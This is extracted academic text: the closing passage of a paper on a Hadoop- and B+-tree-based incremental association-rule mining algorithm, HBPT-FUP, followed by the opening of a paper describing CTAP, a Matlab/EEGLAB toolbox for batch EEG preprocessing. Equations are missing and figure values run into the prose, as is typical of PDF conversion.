(shopping data record), and the support degree and confidence corresponding to the rule are calculated, as shown in Tab.3 (support, confidence in parentheses): TABLE IV. RULE SUPPORT AND CONFIDENCE CALCULATION RESULTS ham bread coffee butter (0.4,0.55) (0.13,0.28) (0.2,0.3) yogurt (0.36,0.54) (0.63,0.58) (0.26,0.39) cheese (0.43,0.51) (0.3,0.53) (0.31,0.52) a) For the data in Tab.2, set the reliability threshold to 0.5, the support threshold to 0.3, and run frequent pattern mining. The association rules available according to Tab.3 are: butter->ham,yogurt->ham,yogurt->bread, cheese->ham,cheese->bread, cheese->coffee. b) Set the reliability threshold to 0.5 and the support threshold to 0.4. Run frequent pattern mining. The association rules available according to Tab.3 are: butter->ham, yogurt->bread, cheese->ham. c) Set the reliability threshold to 0.5 and the support threshold to 0.6. Run frequent pattern mining. The association rules available according to Tab.3 are: yogurt->bread. The Newton interpolation formula for the known support threshold is . Then can get the RD CD International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 12 following three expressions: So you can get three interpolation nodes as:(0.4375,0.3),(0.25,0.4),(0.0625, 0.6). According to these three interpolation nodes, the difference quotient is shown in Tab.4: TABLE V. DIFFERENCE QUOTIENT TABLE Number of rules ( ) First order difference quotient Second order difference quotient 1 0.0625 0.6 4 0.25 0.4 -1.07 7 0.4375 0.3 -0.53 1.44 From Tab.4, a second-order Newton interpolation polynomial can be written: (5) At this time, the support threshold can be estimated according to the Newton interpolation formula and the number of association rules expected by the user. a) Determining the association rules that the user desires to mine (when the database update is about to be performed next time, the number of expected association rules is set to the average value of the total number of association rules of the previous mining); b) Calculate the value of X according to the formula ; c) Substituting the value of X into to calculate the estimated value of support Sup. Assuming that the user expects to mine three association rules, the calculated x value is: (6) Then the X value is substituted into to get the support: . Sup can be chosen to be a value close to 0.455. For example, take sup=0.45 as the support threshold to perform the mining algorithm. E. Algorithm Implementation 1) Brief description of the algorithm steps Using the tree structure to store information, a Hadoop-based incremental association rule mining algorithm HBPT-FUP is proposed. The algorithm is described as follows: Step 1: traversing the transaction database, processing according to the vertical data representation to get the item set. In the Setup phase: initialize the number of packets Q, distribute the transaction items of the primary node to the Q child nodes. A vertical data set is created in each node, and the vertical data set is traversed to obtain an item set inserted into the B+ tree. Step 2: In each child node, all the frequent item sets of the group are obtained according to the generated B+ tree. Step 3: When the transaction database updates the record, follow the first step to balance all incremental load to each node. The main focus is on the update algorithm of the B+ tree. Add a keyword to the leaf node at the bottom of the B+ tree. If the number of keywords contained in the node does not exceed M, the insertion is successful. Otherwise, the node needs to be split. The number of keywords included in the two new nodes after splitting should not be less than (M/2 + 1). If the parent node of the node has enough space (M/2 ~ M-1), the parent node should contain the smallest keyword in the right node. Otherwise, the parent node is International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 13 split and a new keyword is added to the parent of the parent node, followed by a higher order until the new root node is generated (1 ~ M-1). Step 4: Association rules generated after database update. 2) Algorithm flowchart Begin Scan the transaction database to get the transaction item set Distribute to different Reduce nodes according to Map. Constructing an inverted index tree Statistics get the global candidate set and its frequency Is the frequency greater than the minimum support? Output frequent item sets Combine different frequent items to calculate their confidence Is it greater than the minimum confidence? Output association rule Whether the database is updated? END YES NO YES Delete YES NO NO Figure 3. HBPT-FUP algorithm step diagram IV. EXPERIMENTRESULTS AND ANALYSIS In this experiment, the file retail (association rule study classic data set) downloaded from the UCI database was used as the experimental transaction data set, and the HBPT-FUP algorithm was compared with the Apriori algorithm. Use java language to simulate on Win7, dual-core 2.3GHZ CPU, 4GB memory PC. 1) Analysis of the time complexity of the algorithm When the data is updated, ○1 only scans and updates part of the data in the database;○2 scans the tree structure once and inserts the new item set. The analysis shows that when the minimum support is constant, the execution time of the algorithm is related to the amount of data updated each time. A small number of experimental samples are extracted from the dataset, and the minimum support degree of the Apriori algorithm is controlled (min_sup=0.45), and the amount of updated data is sequentially increased. The experimental time of the Apriori algorithm and the HBPT-FUP algorithm on a PC is recorded Figure 4 shows: Figure 4. Apriori and HBPT-FUP algorithms time comparison As shown in Figure 4, when the minimum support is constant, the execution time of the Apriori algorithm grows faster than the HBPT-FUP algorithm when the data set increases. When the data set is the same, the Apriori algorithm takes longer than the HBPT- FUP. 2) Comparison of the number of association rules mined. When the database is updated, the minimum support threshold of the Apriori algorithm does not change (0.45), and the use of the Newton interpolation polynomial in the HBPT-FUP algorithm predicts the next minimum support threshold, which in turn makes the mined rules more efficient. In Experiment 1, the number of association rules mined each time is counted separately. The number comparison is shown in Figure 5: 0 200 400 600 800 10000 15000 25000 40000 E xe cu ti o n t im e / s Number of transaction items Apriori HBPT-FUP International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 14 Figure 5. Comparison of the number of association rules As shown in Figure 5, when the amount of update data increases, the minimum support remains unchanged, and the number of association rules mined by the Apriori algorithm is less than that extracted by the HBPT-FUP algorithm. After adjusting the minimum support, the HBPT-FUP algorithm mines some rules that are easily missed, which increases the validity of the rules. 3) Analyze the spatial complexity of the algorithm ○1 In the B+ tree, only the item set and its frequency are stored, so the size of the occupied memory space is related to the total number of items; ○2 storing the frequent item sets determined by the minimum support, Therefore, the memory space is related to the minimum support. a) Study the impact of the number of transaction item sets on memory usage. A small number of experimental samples are extracted from the data set, and the minimum support degree of the Apriori algorithm and the HBPT-FUP algorithm is controlled (min_sup=0.45), and the amount of updated data is sequentially increased. The Apriori algorithm and the memory usage of the HBPT-FUP algorithm on one of the PCs are recorded separately, as shown in Figure 6. (Set the minimum support threshold of the HBPT-FUP algorithm to remain the same) Figure 6. Memory usage comparison As shown in Figure 6, when the minimum support is unchanged and the number of transaction items increases, the number of items generated increases, and the memory space occupied is larger. The Apriori algorithm updates the candidate set with the change of the number of transaction items. The memory space stores the candidate set and the frequent item set. The HBPT-FUP algorithm is based on distributed, and only stores data and its frequency in the tree structure of each node. Therefore, the Apriori algorithm takes up more memory space than the HBPT-FUP algorithm. b) Study the impact of minimum support on memory usage. When the minimum support of the Apriori algorithm changes from 0.2 to 0.6, the data samples (10000) and increments (10000) remain unchanged, and the memory usage when running the Apriori algorithm and the HBPT-FUP algorithm on a PC is recorded separately. Figure 7 shows. (The minimum support threshold for the HBPT-FUP algorithm is automatically estimated based on the Newton interpolation polynomial when the database is updated) 0 200 400 600 800 1000 1200 10000 15000 25000 40000 N u m b e r o f a ss o ci a ti o n r u le s Number of transaction items Apriori HBPT-FUP 0 500000 1000000 1500000 2000000 2500000 3000000 3500000 10000 15000 25000 40000 M e m o ry u sa g e /k Number of transaction items Apriori HBPT-FUP International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 15 Figure 7. Memory usage comparison As shown in Figure 7, the smaller the minimum support, the more the number of items generated, the larger the memory space occupied. In the case of the change of support degree, the Apriori algorithm updates the candidate set with the change of the support degree, and saves the candidate set and the frequent item set in the memory space. The HBPT-FUP algorithm does not generate the candidate set during the support change process, so The Apriori algorithm occupies more memory than the HBPT-FUP algorithm. V. CONCLUSION In this paper, a parallel update algorithm based on load balancing for incremental update association mining algorithm HBPT-FUP is proposed.The algorithm effectively realizes that when the database is updated, the original database is not scanned, and the newly added data is inserted into the tree based on the original B+ tree to obtain a frequent item set. Handle large-scale data with load balancing technology. Distribute data to different PCs in the cluster. The experimental results show that when the number of transaction records is the same as the amount of new data, the time spent by the HBPT-FUP algorithm is less than 14.3% of the Apriori algorithm, which improves the efficiency of mass data processing. When the minimum support changes, the memory space occupied by the HBPT-FUP algorithm on the same PC is much smaller than the Apriori algorithm. The algorithm has some improvements in terms of efficiency and memory usage. ACKNOWLEDGMENT First of all, I would like to thank my tutor during the master's degree, Professor Wang Jianguo. During my writing stage, Mr. Wang continued to give guidance and help, and taught me the direction of my own research. Mr. Wang has a wealth of professional domain knowledge and excellent data mining direction. Under the kind guidance of Mr. Wang, my ideas have been broadened, the bottlenecks in the research process have been solved, and my ideas have been implemented more steadily. At the same time, Mr. Wang is serious and responsible for his work and his mastery of professional knowledge. It is worth everyone to learn and respect.Secondly, I would like to thank Xi'an Technological University for guiding me to grow up. Finally, I am very grateful to the journal for including my thesis. REFERENCES [1] Mao Guojun, Duan Lijuan, Wang Shi et al. The first edition of data mining principles and algorithms, Beijing Tsinghua University Press. 2005: 156-162. [2] Rakesh Agrawal, TomaszImieliński,Arun Swami. Mining association rules between sets of items in large databases[J]. ACM SIGMOD Record,1993,22(2). [3] FENG Yucai, FENG Jianlin. Incremental Updating Algorithm for Association Rules[J] .Journal of Software, 1998,9 (4): 301. [4] Yuan Changan, Data mining theory and SPSS clementine jewel [M]. Beijing: Publishing House of Electronics Industry,2009. [5] XIE Peng-jun. Study on Parallelization of Frequent Item sets Mining Algorithm Based on MapReduce [D]. Nanjing: Nanjing University, 2012. [6] SHI Liang, QIAN Xue-zhong. Study and Implementation of Parallel FP-Growth AlgorithmBased on Hadoop [J]. Microelectronics and Computer, 2015, 4 (4):150. [7] Incremental maintenance of discovered association rules and approximate dependencies[J]. Alain Pérez-Alonso, Ignacio J. Blanco Medina, Luisa M. González-González, José M. Serrano Chica. Intelligent Data Analysis. 2017(1):117. [8] JES_US R, CAMPA~NA, JUAN M,et,al.Indexing fuzzy numerical data with a B+ tree for fast retrieval using necessity-measured flexible conditions[J].World Scientic,2009,17(1):1. [9] HU Yanbo,ZHONG Jun. Based on clustering B + tree database index optimization algorithm [J]. Computer Applications, 2013,33 (9): 2474. [10] David W.Cheung, Jiawei Han. Maintenance of Discovered Association Rules in Large Databases: An Incremental Updating Technique. In Proc of the Twelfth International Conference on Data Engineering,1996.USA: IEEE, 1996(3):106-114. [11] Chen Fengjuan.Vertical Data Format Mining of Probabilistic Data Sets[J].Journal of Anyang Teachers College,2016(02):41-43+69. [12] Wang Yingqiang, Shi Yongsheng.Application of B+ Tree in Database Indexing[J].Journal of Yangtze University,2008,3(5):233. [13] Chen Xiaojiang, Huang Yucan, et al. Numerical analysis. Beijing: Science and Technology Press. 0 200000 400000 600000 800000 1000000 1200000 0.2 0.3 0.4 0.5 0.6 M e m o ry u sa g e / k Minimum support Apriori HBPT-FUP International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 16 [14] Alan Sexton,HayoThielecke. Reasoning about B+ Trees with Operational Semantics and Separation Logic[J]. Electronic Notes in Theoretical Computer Science,2008,218. [15] HyunyoonYun,DanshimHa,BuhyunHwang,et al. Mining association rules on significant rare data using relative support[J]. The Journal of Systems & Software,2003,67(3). [16] Jia Wang,HongguangLi,JingwenHuang,et al. Association rules mining based analysis of consequential alarm sequences in chemical processes[J]. Journal of Loss Prevention in the Process Industries,2016,41. work_r5i77dk2kzawzo3ozx4fu4uiqi ---- Computational testing for automated preprocessing: a Matlab toolbox to enable large scale electroencephalography data processing Computational testing for automated preprocessing: a Matlab toolbox to enable large scale electroencephalography data processing Benjamin U. Cowley1,2, Jussi Korpela1 and Jari Torniainen3 1 BrainWork Research Centre, Finnish Institute of Occupational Health, Helsinki, Finland 2 Cognitive Brain Research Unit, Faculty of Medicine, University of Helsinki, Helsinki, Finland 3 Biophysics of Bone and Cartilage Group, Department of Applied Physics, University of Eastern Finland, Kuopio, Finland ABSTRACT Electroencephalography (EEG) is a rich source of information regarding brain function. However, the preprocessing of EEG data can be quite complicated, due to several factors. For example, the distinction between true neural sources and noise is indeterminate; EEG data can also be very large. The various factors create a large number of subjective decisions with consequent risk of compound error. Existing tools present the experimenter with a large choice of analysis methods. Yet it remains a challenge for the researcher to integrate methods for batch-processing of the average large datasets, and compare methods to choose an optimal approach across the many possible parameter configurations. Additionally, many tools still require a high degree of manual decision making for, e.g. the classification of artefacts in channels, epochs or segments. This introduces extra subjectivity, is slow and is not reproducible. Batching and well-designed automation can help to regularise EEG preprocessing, and thus reduce human effort, subjectivity and consequent error. We present the computational testing for automated preprocessing (CTAP) toolbox, to facilitate: (i) batch-processing that is easy for experts and novices alike; (ii) testing and manual comparison of preprocessing methods. CTAP extends the existing data structure and functions from the well-known EEGLAB toolbox, based on Matlab and produces extensive quality control outputs. CTAP is available under MIT licence from https://github.com/bwrc/ctap. Subjects Bioinformatics, Brain–Computer Interface Keywords Computation, Testing, Automation, Preprocessing, EEGLAB, Electroencephalography, Signal processing INTRODUCTION Measurement of human electroencephalography (EEG) is a rich source of information regarding certain aspects of brain functioning, and is the most lightweight and affordable method of brain imaging. Although it can be possible to see certain large effects without preprocessing at all, in the general-case EEG analysis requires careful preprocessing, with some degree of trial-and-error. Such difficult EEG preprocessing needs to be supported with appropriate tools. The kinds of tools required for signal processing depends on the properties of data, and the general-case properties of EEG are demanding: large datasets and indeterminate data contribute to the number and complexity of operations. How to cite this article Cowley et al. (2017), Computational testing for automated preprocessing: a Matlab toolbox to enable large scale electroencephalography data processing. PeerJ Comput. Sci. 3:e108; DOI 10.7717/peerj-cs.108 Submitted 15 June 2016 Accepted 8 February 2017 Published 6 March 2017 Corresponding author Benjamin U. Cowley, benjamin.cowley@ttl.fi Academic editor Bertram Ludäscher Additional Information and Declarations can be found on page 24 DOI 10.7717/peerj-cs.108 Copyright 2017 Cowley et al. Distributed under Creative Commons CC-BY 4.0 https://github.com/bwrc/ctap http://dx.doi.org/10.7717/peerj-cs.108 mailto:benjamin.�cowley@�ttl.�fi https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.108 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ In most research applications EEG data can be very large; systems are available with over 256 channels. This can result in the need to examine thousands or tens of thousands of data-points; for instance, visual examination of raw data quality for 50 subjects � 256 channels � 1,200 s ≅ 16,000 plot windows (where each window shows 32 channels � 30 s). Also, normally EEG can require many operations (see e.g. Cowley et al., 2016 for a review), such as referencing, event-handling, filtering, dimensional reduction and artefact detection in channels, epochs or otherwise; all of which is time- consuming and therefore costly. Many of these operations require repeated human judgements, e.g. selection of artefactual independent components (ICs) (Chaumon, Bishop & Busch, 2015), leading to subjectivity, non-reproducibility of outcomes and non-uniformity of decisions. Nor is it possible that all such operations can ever be completely automated, as it is not possible to provide a ground-truth for computational methods by uniquely determination of the neural sources of EEG. With many relatively complex standard operations, code for EEG processing can also be harder to debug (Widmann & Schröger, 2012). These issues illustrate the need for a software tool, a workflow management system, that helps to integrate the wealth of existing methods. Some standards have been suggested (Keil et al., 2014), however Bigdely-Shamlo et al. (2015) have pointed out that ‘artefact removal and validation of processing approaches remain a long-standing open problem for EEG’. The EEGLAB toolbox (Delorme & Makeig, 2004) and its various plug-ins provide a wealth of functions, but in this ecosystem it remains difficult and time-consuming to build the necessary infrastructure to manage, regularise and streamline EEG preprocessing. A workflow management system for data-processing pipelines helps to ensure that the researcher/analyst saves most of their cognitive effort for choosing analysis steps (not implementing them) and assessing their outcome (not debugging them). A regularised workflow maximises the degree to which each file is treated the same— for EEG this means to minimise drift in file-wise subjective judgements, such as estimating the accuracy of artefact detection algorithm(s) by visual inspection. A streamlined workflow can be enabled by separating the building of functions (for analysis or data management) from exploring and tuning the data. These features improve reproducibility and separate the menial from the important tasks. To meet these needs, in this paper we present the computational testing for automated preprocessing (CTAP) toolbox. Approach The CTAP toolbox is available as a GitHub repository at https://github.com/bwrc/ctap. It is built on Matlab (R2015a and higher) and EEGLAB v13.4.4b; limited functions, especially non-graphical, may work on older versions but are untested. The aim of CTAP is to regularise and streamline EEG preprocessing in the EEGLAB ecosystem. In practice, the CTAP toolbox extends EEGLAB to provide functionality for: (i) batch-processing using scripted EEGLAB-compatible functions; (ii) testing and Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 2/26 https://github.com/bwrc/ctap http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ comparison of preprocessing methods based on extensive quality control outputs. The key benefits include: � Ability to run a subset of a larger analysis � Bookkeeping of intermediate result files � Error handling � Visualisations of the effects of analysis steps � Simple to customise and extend � Reusable code � Feature and raw data export We will next briefly motivate each of the benefits above. Incomplete runs: A frequent task is to make a partial run of a larger analysis. This happens, for example, when new data arrives or when the analysis fails for a few measurements. The incomplete run might involve a subset of (a) subjects, (b) measurements, (c) analysis branches, (d) collections of analysis steps, (e) single steps; or any combination of these. CTAP provides tools to make these partial runs while keeping track of the intermediate saves. Bookkeeping: A given EEG analysis workflow can have several steps, branches to explore alternatives and a frequent need to reorganise analysis steps or to add additional steps in between. Combined with incomplete runs, these requirements call for a system that can find the correct input file based on step order alone. CTAP does this and saves researchers time and energy for more productive tasks. Error handling: Frequently, simple coding errors or abnormal measurements can cause a long batch run to fail midway. CTAP catches such errors, saves their content into log files for later reference and continues the batch run. For debugging purposes it is also possible to override this behaviour and use Matlab’s built-in debugging tools to solve the issue. Visualisations: It is always good practice to check how the analysis alters the data. CTAP provides several basic visualisations for this task giving the user additional insight into what is going on. See ‘Results’ for examples. Customisation: In research it is vital to be able to customise and extend the tools in use. Extending CTAP with custom functions is easy as the interface that CTAP_�.m functions must implement is simple. Intermediate results are stored in EEGLAB format and can be directly opened with the EEGLAB graphical user interface (GUI) for inspection or manual processing. Code reuse: The CTAP_�.m functions act as wrappers that make it possible to combine methods to build analysis workflows. Most analysis steps are actually implemented as standalone functions, such that they can be used also outside CTAP. In contrast to EEGLAB, CTAP functions do not pop-up configuration windows that interfere with automated workflows. Export facilities: Exporting results might prove time-consuming in Matlab as there are no high-level tools to work with mixed text and numeric data. To this end, CTAP provides its own format of storing data and several export options. Small datasets can be Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 3/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ exported as, e.g. comma delimited text (csv) while larger sets are more practically saved in an SQLite database. CTAP also offers the possibility to store single-trial and average event-related potential (ERP) data in HDF5 format, which makes the export to R and Python simple. In summary, CTAP lets the user focus on content, instead of time-consuming implementation of foundation functionality. In the rest of the paper, we describe how CTAP toolbox does this using a synthetic dataset as a running example. We start with related work followed by the ‘Materials and Methods’ section detailing the architecture and usage of CTAP. The ‘Results’ section then describes the technical details and outcomes of a motivating example application. In the ‘Discussion’ section we set out the philosophy and possible uses of CTAP toolbox, including development as well as preprocessing; and describe issues and potential directions for future work. Related work Many methods are available from the literature to facilitate automated preprocessing (Agapov et al., 2016; Baillet et al., 2010; Barua & Begum, 2014), and the rate of new contributions is also high. 1 In a milestone special issue (Baillet, Friston & Oostenveld, 2011) gathered many of the academic contributions available at that time. This special issue is quite skewed towards tools for feature extraction, which illustrates again the need for better/more up-to-date solutions for the fundamental stages of EEG processing. Among tools dedicated to EEG processing, EEGLAB stands out for its large user community and high number of third-party contributors, to the degree that it is considered by some to be a de facto standard. Although EEGLAB functions can be called from the command-line interface and thus built into a preprocessing pipeline by the user’s own scripts, in practice this is a non-trivial error-prone task. Other popular tools focus on a more diverse set of signals, especially including magnetoencephalography (MEG). Brainstorm (Tadel et al., 2011), Fieldtrip (Oostenveld etal.,2011) and EMEGS (ElectroMagnetic EncaphaloGraphy Software) (Peyk, De Cesarei & Junghöfer, 2011) are all open source tools for EEG and MEG data analysis. Brainstorm in particular, but also the others, have originated with an emphasis on cortical source estimation techniques and their integration with anatomical data. Like EEGLAB, these tools are all free and open source, but based on the commercial platform Matlab (Natick, MA, USA), which can be a limitation in some contexts due to high licence cost. The most notable commercial tool is BrainVISION Analyzer (Brain Products GmbH, Munich, Germany), a graphical programming interface with a large number of features. Tools which are completely free and open source are fewer in number and have received much less supplemental input from third parties. Python tools include MNE-Python for processing MEG and EEG data (Gramfort et al., 2013) and PyEEG (Bao, Liu & Zhang, 2011), a module for EEG feature extraction. MNE, like Brainstorm and Fieldtrip, is primarily aimed at integrating EEG and MEG data. Several packages exist for the R computing environment, e.g. (Tremblay & Newman, 2015), however these do not seem to be intended as general-purpose tools. 1 For example, we conducted a search of the SCOPUS database for articles pub- lished after 1999, with “EEG” and “electroencephalography” in the title, abstract or keywords, plus “Signal Processing” or “Signal Processing, Computer-Assisted” in keywords, and restricted to subject areas “Neuroscience”, “Engineering” or “Computer Science”. The search returned over 300 hits, growing year-by- year from 5 in 2000 up to a mean value of 36 between 2010 and 2015. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 4/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ However, CTAP was designed to complement the existing EEGLAB ecosystem, not to provide a stand-alone preprocessing tool. This is an important distinction, because there exist some excellent stand-alone tools which work across data formats and platforms (Bellec et al., 2012; Ovaska et al., 2010) 2 ; these features are valuable when collaborators are trying to work across, e.g. Windows and Linux, Matlab and Python. However, we do not see a need in this domain; rather we see a need in the much narrower focus on improving the command-line interface batch-processing capabilities of EEGLAB. We have chosen to extend EEGLAB because it has received many contributions to the core functionality, and is thus compatible with a good portion of the methods of EEG processing from the literature. Some compatible tools from the creators of EEGLAB at the Swartz Centre for Computational Neuroscience (SCCN) are detailed in (Delorme et al., 2011), including tools for forward head modelling, estimating source connectivity and online signal processing. Other key third-party preprocessing contributions to EEGLAB include SASICA (Chaumon, Bishop & Busch, 2015), FASTER (Nolan, Whelan & Reilly, 2010) and ADJUST (Mognon et al., 2011), all semi-automated solutions for selection of artefactual data. In terms of similar tools Bigdely-Shamlo et al. (2015) released the PREP pipeline for Matlab, which also uses the EEGLAB data structure. PREP introduces specific important functionality for referencing the data, line noise removal and detecting bad channels. PREP is aimed only at experiment-induced artefacts and not those deriving from subject- activity such as, e.g. blinks, and is designed to be complementary to the various algorithm toolboxes for artefact-removal by focusing on early-stage processing. In similar vein, CTAP is intended to be complementary to existing toolboxes including PREP. For example, methods from FASTER and ADJUSTare featured in CTAP as options for detecting bad data. This integration of existing solutions illustrates one core principle of CTAP: it aims to extend an existing rich ecosystem of EEG-specific methods, by meeting a clear need within that ecosystem for a workflow management system. The ready-made automation of batching and bookkeeping gives the user a distinct advantage over the common approach of ‘EEGLAB + a few scripts’, which seems simple on its face, but in practice is non-trivial as the number and complexity of operations grows. As all algorithms added to CTAP will produce quality control outputs automatically, fast performance comparison is possible between methods or method parameters, speeding the discovery of (locally) optimal solutions. The system has potential to enable such parameter optimisation by automated methods, although this is not yet implemented. MATERIALS AND METHODS The core activity of CTAP is preprocessing EEG data by cleaning artefacts, i.e. detection and either correction or removal of data that is not likely to be attributable to neural sources. CTAP is able to operate on three different temporal granularities: channel, epoch and segment. Channel operations affect the entire time series at one spatial location. Epoch operations are performed on one or several epochs produced by EEGLAB epoching function. Finally, segments are fixed time-windows around specific events which can be extracted from both channel and epoch levels, see Fig. 1. An example of a typical segment 2 Also NeuroPype, a commercial Python- based graphical programming environ- ment for physiological signal processing. However, to the authors’ knowledge, it has not been documented in a peer reviewed publication. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 5/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ could be a blink artefact with a window wide enough to include the entire blink waveform. Further functionality is provided for independent component analysis (ICA)-based methods. Artefact-detection methods based on some flavour of ICA algorithm have been shown to outperform temporal approaches (Delorme, Sejnowski & Makeig, 2007). It was also shown that ICs are valid representations of neural sources (Delorme et al., 2012). CTAP can thus help to combine the existing methods for EEG signal processing. Outline of usage Figure 2 shows the core components of CTAP. The coloured boxes represent entities that the user has to specify in order to use CTAP. These are: � What analysis functions to apply and in which order (analysis pipe) � Analysis environment and parameters for the analysis functions (configuration) � Which EEG measurements/files to process (measurement configuration) Typically, the analysis is run by calling a single script that defines all of the above and passes these on to the CTAP_pipeline_looper.m function, that performs all requested analysis steps on all specified measurements. In the following, we describe in more detail how the configurations are made, how the pipe is executed, what outputs it provides and what options the user has to control the pipe. The complete details of all these aspects of CTAP are provided in the wiki pages of the GitHub repository, which will be referenced below as ‘the wiki’. 3 Configuration In CTAP a large analysis is broken down into a hierarchical set of smaller entities: steps, step sets, pipes and branches. Several analysis steps form a step set and an ordered sequence of step sets is called a pipe. Pipes can further be chained to form branches. The smallest unit is the analysis step which might be e.g. a filtering or a bad channel detection operation. A step is represented by a single call to a CTAP_�.m-function. Step sets and pipes are used to chop the analysis down into smaller chunks that are easy to move around if needed. Intermediate saves are performed after each step set and therefore the organisation of steps into step sets also affects the way the pipe shows up on disk. Intermediate saves provide a possibility run the whole analysis in smaller chunks and to manually check the mid-way results as often needed, e.g. while debugging. Further on, the ability to create branches is important to help explore alternative ways of analysing the same data. Figure 1 Relationship of the time domain data constructs dealt with in CTAP. 3 https://github.com/bwrc/ctap/wiki. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 6/26 https://github.com/bwrc/ctap/wiki http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ To specify the order of steps and sets within a pipe, we recommend to create a single m-file for each intended pipe. 4 This file will define both the step sets as well as all the custom parameters to be used in the steps. Default parameters are provided, but it is optimal to fine tune the behaviour by providing one’s own parameters. Both pipe and parameter information is handled using data structures, rather than hard-coding. CTAP then handles assignment of parameters to functions based on name matching. Once the steps and their parameters are defined, the last requirement to run the pipe is to define the input data. In CTAP the input data are specified using a table-like structure called measurement config that lists all available measurements, the corresponding raw EEG files, etc. This dedicated measurement config data structure allows for an easy selection of what should be analysed and it also helps to document the project. It can ctap_pipeline_looper() * executes the pipe * handles errors * loads and stores data EEGout = ctapeeg_some step(EEGin) * actual implementation * standaloneCTAP_some step() * wrapper to enable pipe building ctapeeg_some step() CTAP_some step() ... EEGout = any_analysis_step(EEGin) * actual implementation * standalone any_analysis_step() configuration * set environment: - paths - files - electrode setup * parameters for analysis steps analysis pipe * what steps are run? * how are they organized into step sets? * how does the analysis branch? * documents raw data * autogenerated or user defined * used to select what to analyze measurement config (MC) Figure 2 An overview of the core logic of CTAP. ‘Configuration’, ‘analysis pipe’ and ‘measurement config’ illustrate the parts that a user must specify. White boxes represent Matlab functions, with the function-name on top. 4 For an example, see the cfg_manu.m in the repository. Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 7/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ be created manually or auto-generated based on a list of files or a directory. The former allows for full control and enforces project documentation whereas the latter is intended for effortless one-off analyses. Both spreadsheet and SQLite formats are supported. In the last required step before pipeline execution, the configuration struct and the parameter struct are checked, finalised and integrated by cfg_ctap_functions.m. Pipe execution Once all prerequisites listed above have been specified, the core CTAP_pipeline_looper.m function is called to run the pipe. This function takes care of loading the correct (initial or intermediate) data set, applying the specified functions from each step set, and intermediate saving of the data. The looper manages error handling such that it is robust to crashing (unless in Debug mode), and will simply skip the remaining steps for a crashed file. Other settings determine how to handle crashed files at later runs of the pipe (see Documentation). CTAP_pipeline_looper.m is designed to accept functions named CTAP_�.m, as these are defined to have a fixed interface. They take two arguments: data (EEG) and configuration struct (Cfg); and they return the same after any operations. Some CTAP_�.m perform all operations (e.g. call EEGLAB functions) directly, while others call a corresponding ctapeeg_�.m function that actually implements the task. Hence CTAP_�.m functions can be regarded as wrappers that facilitate batch-processing by providing a uniform interface. They also implement, e.g. the plotting of quality control figures. Since CTAP_�.m functions are quite simple, new ones can easily be added by the user to include new analysis steps, working from the provided CTAP_template_function.m. Users can also call the ctapeeg_�.m functions directly as part of their own custom scripts, since these are meant to be used like any EEGLAB analysis function. Analysis results are saved separately for each pipe. A typical structure contains: � Intermediate results as EEGLAB datasets, in one directory per step set; names are taken from the step set IDs as defined by the user, prefixed by step number. � export directory contains exported feature data (txt, csv or SQLite format). � features directory: computed EEG features in Matlab format. � logs directory: log files from each run. � quality_control directory: quality control plots, reflecting the visualisations of analysis steps chosen by the user. Apart from running the complete pipe at once the user has many options to run just a subset of the pipe, analyse only certain measurements or otherwise adjust usage. Table 1 gives some examples. Analytic methods As presented, CTAP is primarily a framework for analysis management; however it contains a number of analysis functions, functions for evaluation and data-management functions including a way to generate synthetic datasets for testing (for details see function documentation). The user is easily able to add their preferred functions, but may note Cowley et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.108 8/26 http://dx.doi.org/10.7717/peerj-cs.108 https://peerj.com/computer-science/ the available functions as a quick way to start. All provided functions, for analysis, evaluation or data-handling, have default parameters which may serve as a starting point. Almost all EEG processing methods in CTAP are either novel or rewritten from original source, usually because of the unintended side-effects of the original code, such as graphical pop-ups. Thus the outputs are similar to those of original EEGLAB or other toolbox methods, but the code base is refactored. The highlights of available CTAP_�.m functions include: � Functions to load data (and extract non-EEG data, e.g. ECG), events (and modify them) or channel locations (and edit them); � Functions to filter, subset select (by data indices or by events), re-reference, epoch or perform ICA on the data; � Functions to detect artefactual data, in channels, epochs, segments or ICA components, including: – Variance (channels), – Amplitude threshold (epochs, segments, ICA components), – EEGLAB’s channel spectra method (channels, epochs), – Metrics from the FASTER toolbox (channels, epochs, ICA components), – Metrics from the ADJUST toolbox (ICA components), – Additionally bad data can be marked by events where detection is performed by some external method; � Functions to reject bad data, normalise or interpolate; � Functions to extract time and frequency domain features, and create visualisations of data (as described below). Table 1 Some advanced ways to use the pipe. Usage options Possible reasons How Subset step sets Investigate a bug; recompute only intermediate results Set run sets to subset index, e.g. Cfg.pipe.runSets = 3:5 Run test step set Test new feature before including in pipe Add step set with id ‘test’, then set Cfg.pipe.runSets = `test' ‘Rewire’ the pipe Test an alternative ordering of existing steps or temporarily change the input of some step Set the .srcID of a given step set equal to the id of another Measurement configuration filter Run pipe for: subset of test subjects, or: measurements classes with separate configurations, e.g. pilots Use function struct_filter.m Run in debug mode Develop new method in CTAP Set CTAP_pipeline_looper parameter ‘debug’, true Overwrite obsolete results Update part of pipe: write new step set output over existing files Set CTAP_pipeline_looper parameter ‘overwrite’, true Write files from failed step sets Check partial outcome of step set Set CTAP_pipeline_looper.m parameter ‘trackfail’, true Turn off intermediate saves Extract numerical/visual analytics without 